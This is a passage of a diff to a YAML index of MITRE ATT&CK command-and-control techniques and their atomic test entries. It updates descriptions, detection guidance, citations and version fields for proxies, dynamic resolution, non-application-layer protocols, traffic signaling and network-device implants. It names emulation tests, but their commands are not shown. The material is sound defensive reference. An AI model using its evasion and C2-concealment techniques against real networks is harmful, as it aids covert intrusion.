sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used. (Citation: University of Birmingham C2)'
- x_mitre_data_sources:
- - Packet capture
- - Netflow/Enclave netflow
- - Process use of network
- - Process monitoring
- x_mitre_version: '1.0'
+ x_mitre_network_requirements: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_is_subtechnique: false
+ x_mitre_deprecated: true
atomic_tests: []
T1092:
technique:
@@ -48579,7 +56601,7 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-03-27T19:02:44.600Z'
+ modified: '2020-10-21T16:26:34.196Z'
created: '2020-03-15T16:27:31.768Z'
x_mitre_contributors:
- Jan Petrov, Citi
@@ -48590,11 +56612,10 @@ command-and-control:
Monitor for DNS traffic to/from known-bad or suspicious domains.
x_mitre_data_sources:
- - DNS records
- Netflow/Enclave netflow
+ - DNS records
- Process monitoring
- Process use of network
- - Netflow/Enclave netflow
- Packet capture
x_mitre_platforms:
- Linux
@@ -48932,6 +56953,9 @@ command-and-control:
- source_name: mitre-attack
external_id: T1090.004
url: https://attack.mitre.org/techniques/T1090/004
+ - external_id: CAPEC-481
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/481.html
- url: http://www.icir.org/vern/papers/meek-PETS-2015.pdf
description: David Fifield, Chang Lan, Rod Hynes, Percy Wegmann, and Vern
Paxson. (2015). Blocking-resistant communication through domain fronting.
@@ -48951,9 +56975,9 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-06-20T20:53:20.398Z'
+ modified: '2020-09-16T19:30:54.226Z'
created: '2020-03-14T23:29:19.581Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_detection: 'If SSL inspection is in place or the traffic is not encrypted,
the Host field of the HTTP header can be checked if it matches the HTTPS SNI
@@ -49032,7 +57056,7 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-03-12T14:45:22.784Z'
+ modified: '2020-10-02T01:37:39.618Z'
created: '2020-03-10T17:44:59.787Z'
x_mitre_version: '1.0'
x_mitre_is_subtechnique: true
@@ -49041,7 +57065,7 @@ command-and-control:
x_mitre_detection: |-
Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
- Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain or related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Endgame Predicting DGA)
+ Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Endgame Predicting DGA)
x_mitre_data_sources:
- DNS records
- Netflow/Enclave netflow
@@ -49059,21 +57083,6 @@ command-and-control:
atomic_tests: []
T1568:
technique:
- created: '2020-03-10T17:28:11.747Z'
- modified: '2020-03-27T20:54:28.560Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- type: attack-pattern
- id: attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b
- description: |-
- Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
-
- Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
- name: Dynamic Resolution
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1568
@@ -49094,18 +57103,23 @@ command-and-control:
url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - SSL/TLS inspection
- - Web logs
- - DNS records
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Dynamic Resolution
+ description: |-
+ Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
+
+ Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+ id: attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ modified: '2020-10-02T01:37:39.938Z'
+ created: '2020-03-10T17:28:11.747Z'
+ x_mitre_contributors:
+ - Chris Roffe
x_mitre_detection: 'Detecting dynamically generated C2 can be challenging due
to the number of different algorithms, constantly evolving malware families,
and the increasing complexity of the algorithms. There are multiple approaches
@@ -49116,8 +57130,18 @@ command-and-control:
names. In addition to detecting algorithm generated domains based on the name,
another more general approach for detecting a suspicious domain is to check
for recently registered names or for rarely visited domains.'
- x_mitre_contributors:
- - Chris Roffe
+ x_mitre_data_sources:
+ - SSL/TLS inspection
+ - Web logs
+ - DNS records
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1573:
technique:
@@ -49370,7 +57394,7 @@ command-and-control:
associated with transferring files to avoid detection/network filtering by
blending in with existing traffic. Commands to the remote system, and often
the results of those commands, will be embedded within the protocol traffic
- between the client and server. \n\nProtocols such as FTP, FTPS, and TFPT that
+ between the client and server. \n\nProtocols such as FTP, FTPS, and TFTP that
transfer files may be very common in environments. Packets produced from
these protocols may have many fields and headers in which data can be concealed.
Data could also be concealed within the transferred files. An adversary may
@@ -49381,7 +57405,7 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-03-26T20:26:46.465Z'
+ modified: '2020-08-21T14:41:22.911Z'
created: '2020-03-15T16:16:25.763Z'
x_mitre_version: '1.0'
x_mitre_is_subtechnique: true
@@ -49404,8 +57428,21 @@ command-and-control:
atomic_tests: []
T1105:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2017-05-31T21:31:16.408Z'
+ modified: '2020-03-20T15:42:48.595Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
+ id: attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Ingress Tool Transfer
+ description: Adversaries may transfer tools or other files from an external
+ system into a compromised environment. Files may be copied from an external
+ adversary controlled system through the command and control channel to bring
+ tools into the victim network or through alternate protocols with another
+ tool such as FTP. Files can also be copied over on Mac and Linux with native
+ tools like scp, rsync, and sftp.
external_references:
- source_name: mitre-attack
external_id: T1105
@@ -49414,22 +57451,19 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- description: Adversaries may transfer tools or other files from an external
- system into a compromised environment. Files may be copied from an external
- adversary controlled system through the command and control channel to bring
- tools into the victim network or through alternate protocols with another
- tool such as FTP. Files can also be copied over on Mac and Linux with native
- tools like scp, rsync, and sftp.
- name: Ingress Tool Transfer
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-03-20T15:42:48.595Z'
- created: '2017-05-31T21:31:16.408Z'
- x_mitre_version: '2.0'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.
+
+ Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)
x_mitre_data_sources:
- Process command-line parameters
- File monitoring
@@ -49438,17 +57472,7 @@ command-and-control:
- Netflow/Enclave netflow
- Network protocol analysis
- Process monitoring
- x_mitre_detection: |-
- Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.
-
- Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_version: '2.0'
identifier: T1105
atomic_tests:
- name: rsync remote file copy (push)
@@ -49816,6 +57840,21 @@ command-and-control:
name: command_prompt
T1090.001:
technique:
+ created: '2020-03-14T23:08:20.244Z'
+ modified: '2020-03-15T00:46:26.598Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
+ id: attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755
+ description: |-
+ Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.
+
+ By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.
+ name: Internal Proxy
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1090.001
@@ -49828,39 +57867,24 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Internal Proxy
- description: |-
- Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.
-
- By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.
- id: attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-03-15T00:46:26.598Z'
- created: '2020-03-14T23:08:20.244Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_detection: 'Analyze network data for uncommon data flows between clients
- that should not or often do not communicate with one another. Processes utilizing
- the network that do not normally have network communication or have never
- been seen before are suspicious. Analyze packet contents to detect communications
- that do not follow the expected protocol behavior for the port that is being
- used.(Citation: University of Birmingham C2)'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_data_sources:
- Process use of network
- Process monitoring
- Network protocol analysis
- Netflow/Enclave netflow
- Packet capture
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_detection: 'Analyze network data for uncommon data flows between clients
+ that should not or often do not communicate with one another. Processes utilizing
+ the network that do not normally have network communication or have never
+ been seen before are suspicious. Analyze packet contents to detect communications
+ that do not follow the expected protocol behavior for the port that is being
+ used.(Citation: University of Birmingham C2)'
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1090.001
atomic_tests:
- name: Connection Proxy
@@ -49998,15 +58022,9 @@ command-and-control:
atomic_tests: []
T1071.003:
technique:
- created: '2020-03-15T16:21:45.131Z'
- modified: '2020-03-26T20:28:00.985Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- type: attack-pattern
id: attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b
description: "Adversaries may communicate using application layer protocols
- associated with electronic map delivery to avoid detection/network filtering
+ associated with electronic mail delivery to avoid detection/network filtering
by blending in with existing traffic. Commands to the remote system, and often
the results of those commands, will be embedded within the protocol traffic
between the client and server. \n\nProtocols such as SMTP/S, POP3/S, and IMAP
@@ -50027,6 +58045,12 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ modified: '2020-10-21T16:35:45.633Z'
+ created: '2020-03-15T16:21:45.131Z'
x_mitre_platforms:
- Linux
- macOS
@@ -50096,39 +58120,39 @@ command-and-control:
- source_name: mitre-attack
external_id: T1090.003
url: https://attack.mitre.org/techniques/T1090/003
+ - source_name: Onion Routing
+ url: https://en.wikipedia.org/wiki/Onion_routing
+ description: Wikipedia. (n.d.). Onion Routing. Retrieved October 20, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Multi-hop Proxy
- description: To disguise the source of malicious traffic, adversaries may chain
- together multiple proxies. Typically, a defender will be able to identify
- the last proxy traffic traversed before it enters their network; the defender
- may or may not be able to identify any previous proxies before the last-hop
- proxy. This technique makes identifying the original source of the malicious
- traffic even more difficult by requiring the defender to trace malicious traffic
- through several proxies to identify its source.
+ description: |-
+ To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing)
+
+ In the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise. By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport.
id: attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-03-14T23:23:41.770Z'
+ modified: '2020-10-21T17:54:28.280Z'
created: '2020-03-14T23:23:41.770Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_is_subtechnique: true
- x_mitre_detection: When observing use of Multi-hop proxies, network data from
- the actual command and control servers could allow correlating incoming and
- outgoing flows to trace malicious traffic back to its source. Multi-hop proxies
- can also be detected by alerting on traffic to known anonymity networks (such
- as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure
- that uses this technique.
+ x_mitre_detection: |-
+ When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure that uses this technique.
+
+ In context of network devices, monitor traffic for encrypted communications from the Internet that is addressed to border routers. Compare this traffic with the configuration to determine whether it matches with any configured site-to-site Virtual Private Network (VPN) connections the device was intended to have. Monitor traffic for encrypted communications originating from potentially breached routers that is addressed to other routers within the organization. Compare the source and destination with the configuration of the device to determine if these channels are an authorized Virtual Private Network (VPN) connections or other encrypted modes of communication. Monitor ICMP traffic from the Internet that is addressed to border routers and is encrypted. Few if any legitimate use cases exist for sending encrypted data to a network device via ICMP.
x_mitre_data_sources:
+ - Packet capture
- Network protocol analysis
- Netflow/Enclave netflow
x_mitre_platforms:
- Linux
- macOS
- Windows
+ - Network
atomic_tests: []
T1026:
technique:
@@ -50179,13 +58203,14 @@ command-and-control:
atomic_tests: []
T1095:
technique:
- id: attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Non-Application Layer Protocol
- description: |-
- Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
-
- ICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.
+ created: '2017-05-31T21:31:10.728Z'
+ modified: '2020-10-21T19:41:49.412Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1095
@@ -50194,34 +58219,33 @@ command-and-control:
description: Wikipedia. (n.d.). List of network protocols (OSI model). Retrieved
December 4, 2014.
source_name: Wikipedia OSI
+ - source_name: Cisco Synful Knock Evolution
+ url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
+ description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
+ IOS devices. Retrieved October 19, 2020.
- url: http://support.microsoft.com/KB/170292
description: Microsoft. (n.d.). Internet Control Message Protocol (ICMP) Basics.
Retrieved December 1, 2014.
source_name: Microsoft ICMP
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
- url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-03-11T15:09:26.624Z'
- created: '2017-05-31T21:31:10.728Z'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_network_requirements: true
- x_mitre_detection: |-
- Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.
+ description: |-
+ Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
- Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
-
- Monitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.
+ ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution)
+ Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.
+ name: Non-Application Layer Protocol
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b
+ x_mitre_version: '2.1'
+ x_mitre_contributors:
+ - Ryan Becwar
x_mitre_data_sources:
- Host network interface
- Netflow/Enclave netflow
@@ -50229,9 +58253,23 @@ command-and-control:
- Network protocol analysis
- Packet capture
- Process use of network
- x_mitre_contributors:
- - Ryan Becwar
- x_mitre_version: '2.0'
+ x_mitre_detection: "Analyze network traffic for ICMP messages or other protocols
+ that contain abnormal data or are not normally seen within or exiting the
+ network.(Citation: Cisco Blog Legacy Device Attacks)\n\nAnalyze network data
+ for uncommon data flows (e.g., a client sending significantly more data than
+ it receives from a server). Processes utilizing the network that do not normally
+ have network communication or have never been seen before are suspicious.
+ Analyze packet contents to detect communications that do not follow the expected
+ protocol behavior for the port that is being used.(Citation: University of
+ Birmingham C2) \n\nMonitor and investigate API calls to functions associated
+ with enabling and/or utilizing alternative communication channels."
+ x_mitre_network_requirements: true
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ - Network
+ x_mitre_is_subtechnique: false
identifier: T1095
atomic_tests:
- name: ICMP C2
@@ -50548,9 +58586,9 @@ command-and-control:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-07-01T18:23:25.002Z'
+ modified: '2020-10-21T01:26:31.804Z'
created: '2020-07-01T18:23:25.002Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- User
@@ -50563,6 +58601,7 @@ command-and-control:
- Linux
- macOS
- Windows
+ - Network
atomic_tests: []
T1001.003:
technique:
@@ -50685,13 +58724,8 @@ command-and-control:
atomic_tests: []
T1090:
technique:
- id: attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Proxy
- description: |-
- Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
-
- Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1090
@@ -50704,34 +58738,40 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ description: |-
+ Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
+
+ Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.
+ name: Proxy
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-06-20T20:53:20.670Z'
+ modified: '2020-10-21T17:54:28.531Z'
created: '2017-05-31T21:31:08.479Z'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_detection: |-
- Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
-
- Consider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)).
+ x_mitre_version: '3.1'
+ x_mitre_contributors:
+ - Brian Prange
+ - Heather Linn
+ - Walker Johnson
x_mitre_data_sources:
- SSL/TLS inspection
- Process use of network
- Process monitoring
- Netflow/Enclave netflow
- Packet capture
- x_mitre_contributors:
- - Brian Prange
- - Heather Linn
- - Walker Johnson
- x_mitre_version: '3.0'
+ x_mitre_detection: |-
+ Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
+
+ Consider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)).
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1219:
technique:
@@ -51034,6 +59074,8 @@ command-and-control:
Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).
The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
+
+ On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.
external_references:
- source_name: mitre-attack
external_id: T1205
@@ -51042,6 +59084,18 @@ command-and-control:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
+ - source_name: Cisco Synful Knock Evolution
+ url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
+ description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
+ IOS devices. Retrieved October 19, 2020.
+ - source_name: FireEye - Synful Knock
+ url: https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html
+ description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful
